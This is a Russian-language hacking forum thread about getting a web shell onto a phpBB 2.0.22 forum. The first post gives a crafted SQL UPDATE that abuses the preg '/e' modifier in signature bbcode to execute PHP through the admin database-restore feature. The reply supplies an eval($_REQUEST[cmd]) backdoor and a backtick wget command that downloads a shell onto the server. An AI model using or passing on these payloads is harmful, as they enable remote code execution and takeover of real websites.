Форумы phpBB 2.0.22 залить шелл

Discussion in 'Уязвимости CMS/форумов' started by ~nero~, 7 Oct 2012.

  1. ~nero~

    ~nero~ Member

    Joined:
    3 Jul 2012
    Messages:
    15
    Likes Received:
    8
    Reputations:
    3
    Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:
    Code:
    Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
    Напоминаю, после ":" идет любой php код.
    phpinfo() выдает, но при вставке другого кода отказывается восстанавливать базу, либо не открывает страницу профиля
    Пробовал вставлять и system($_GET[cmd]); при восстановлении ругается:
    Code:
    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
     
  2. Ma:DFish

    Ma:DFish Member

    Joined:
    13 Jun 2009
    Messages:
    5
    Likes Received:
    8
    Reputations:
    0
    PHP:
    eval($_REQUEST[cmd]);
    имяфайла.php?cmd=phpкод
    например
    PHP:
    echo `wget cылка с шелом -O имяшела.php`;
     
Loading...